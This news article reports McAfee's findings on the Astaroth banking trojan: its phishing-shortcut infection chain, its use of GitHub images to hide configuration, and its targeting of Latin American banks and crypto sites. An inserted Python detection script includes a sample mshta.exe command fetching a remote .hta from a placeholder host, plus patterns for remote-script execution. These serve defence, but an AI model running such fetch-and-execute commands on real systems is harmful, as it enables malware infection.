Astaroth Trojan Uses GitHub Images to Stay Active After Takedowns
Astaroth banking trojan has evolved to use GitHub and steganography for resilient C2, hiding its vital commands in images. Learn how this sophisticated malware employs fileless techniques to steal banking and crypto credentials from users across Latin America.
A new report from McAfee Labs reveals that a dangerous banking trojan, Astaroth, is being distributed with a worrying new trick to stay active: abusing the software development platform GitHub as a secret backup location.
**An Unexpected New Hiding Place**
Written in Delphi, Astaroth is a banking trojan designed to silently steal login details and passwords using keylogging when a victim accesses banking or cryptocurrency accounts. Normally, these cybercriminals rely on central C2 (command-and-control) servers that security experts can find and disable.
However, the McAfee Threat Research team discovered that Astaroth is storing its vital setup files on GitHub. This means, if the main C2 server is shut down by law enforcement or security experts, Astaroth simply gets new instructions from the GitHub repository, which hosts the information hidden in images using steganography, and continues its operations. Once credentials are stolen, the malware uses the tool Ngrok to secretly exfiltrate the data back to the attackers.
**How the Attack Starts**
The attack usually begins with a phishing email (pretending to be a document or resume) that contains a link. This link downloads a zipped file with a malicious Windows shortcut (.lnk) file.
Astaroth C2 Infrastructure, Phishing Email and Attack Flow (source: McAfee)
Opening this shortcut triggers a complex, multi-stage infection chain that eventually installs Astaroth by abusing legitimate Windows system files, a technique known as living off the land. The .lnk file executes a hidden script using mshta.exe (a Microsoft HTML Application host) to get additional code.
The final malicious payload is then secretly injected into the legitimate Windows process regsvc.exe (Remote Registry Service) to run undetected. The malware also employs various anti-analysis techniques and monitors popular web browsers (it looks for windows whose class name contains chrome, ieframe, mozilla, or xoff).
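The two observable steps of the chain described above (mshta.exe launched from a shortcut, then a remote thread planted in regsvc.exe) can be matched in process telemetry. The following is an added detection example, not code from McAfee or the report; the event shape, field names and the log lines are constructed for this example, and the rules assume a double-clicked .lnk makes mshta.exe a child of explorer.exe.

```python
"""Detect the LNK -> mshta.exe -> regsvc.exe chain in Sysmon-like telemetry.

The event dicts below are a constructed, simplified shape (assumption), not
real Sysmon output; field names are chosen for this example only.
"""
import re

# Constructed sample: a double-clicked shortcut spawning mshta.exe with a remote
# script, a benign local mshta run, and a remote thread created in regsvc.exe.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4101, "ppid": 1200,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 5120, "ppid": 4101,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://example.invalid/resume.hta"'},
    {"type": "process_create", "pid": 5208, "ppid": 900,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"type": "create_remote_thread", "source_pid": 5120,
     "source_image": r"C:\Windows\System32\mshta.exe",
     "target_image": r"C:\Windows\System32\regsvc.exe"},
]

# mshta.exe pulling code from a URL or running an inline script engine.
REMOTE_SCRIPT = re.compile(r"https?://|javascript:|vbscript:", re.IGNORECASE)
# Processes allowed to touch regsvc.exe; an assumption, tune per environment.
INJECTION_ALLOWLIST = {"services.exe", "csrss.exe"}


def is_mshta_from_shortcut(ev, by_pid):
    """mshta.exe whose parent is explorer.exe and whose command line fetches
    a remote or inline script: the shortcut-launched stage of the chain."""
    if ev["type"] != "process_create" or not ev["image"].lower().endswith("\\mshta.exe"):
        return False
    parent = by_pid.get(ev["ppid"], {}).get("image", "").lower()
    return parent.endswith("\\explorer.exe") and bool(REMOTE_SCRIPT.search(ev["cmdline"]))


def is_regsvc_injection(ev):
    """A remote thread created in regsvc.exe by a non-allowlisted source."""
    if ev["type"] != "create_remote_thread":
        return False
    source = ev["source_image"].rsplit("\\", 1)[-1].lower()
    return ev["target_image"].lower().endswith("\\regsvc.exe") and source not in INJECTION_ALLOWLIST


def find_alerts(events):
    """Return (rule, pid) tuples for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process_create"}
    alerts = []
    for ev in events:
        if is_mshta_from_shortcut(ev, by_pid):
            alerts.append(("mshta_from_shortcut", ev["pid"]))
        elif is_regsvc_injection(ev):
            alerts.append(("regsvc_injection", ev["source_pid"]))
    return alerts
```

Both alerts carrying the same pid is the correlation worth escalating: the mshta.exe process that fetched remote code is the one that later injected into regsvc.exe.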
Astaroth targets financial institutions across a wide region, including Brazil (where the current campaign is focused), Mexico, Uruguay, Argentina, Paraguay, Chile, Bolivia, Peru, Ecuador, Colombia, Venezuela, Panama, Portugal, and Italy.
Targeted Brazilian financial institutions include sites like caixa.gov.br, safra.com.br, itau.com.br, bancooriginal.com.br, santandernet.com.br, and btgpactual.com. It also targets cryptocurrency-related sites such as etherscan.io, binance.com, bitcointrade.com.br, and localbitcoins.com.
Moreover, the malware instantly shuts down if it detects that it is being analysed by security researchers. McAfee Labs reported its findings to GitHub, after which the malicious files were taken down, temporarily disrupting this latest activity.
This latest development confirms Astaroth remains one of the most sophisticated online threats and follows previous warnings from security experts. In February 2025, Hackread.com reported on an advanced Astaroth phishing kit discovered by SlashNext that used an “evilginx-style reverse proxy” to easily bypass two-factor authentication (2FA) and steal credentials and session cookies in real time.
The current banking trojan variant primarily relies on keylogging after infection and may not actively bypass 2FA during login. Nevertheless, to protect yourself, the most critical step is to never open links or attachments in emails from unknown senders.
“The threat landscape is surging, in particular the mobile threat landscape, as in 2024, more than 4 million social engineering attacks targeted mobile devices, over 33 million mobile malware/adware incidents were blocked, and phishing attacks rose significantly, especially on iOS,” said Randolph Barr, Chief Information Security Officer at Cequence Security.
“Android continues to face banking Trojans and data-leaking SDKs, while insecure app practices plague both platforms. Most of these attacks are aimed at PII, credentials, and financial data,” Barr cautioned.
“Employers and service providers add a third risk layer. Each validation request is a new integration point, creating an additional attack surface. Bad actors could compromise employer systems, abuse verification APIs, or phish organizations into over-collecting and mishandling sensitive data. Since employers often lack the same level of cybersecurity maturity as, say, government systems, they may become the weakest link in the chain,” he warned.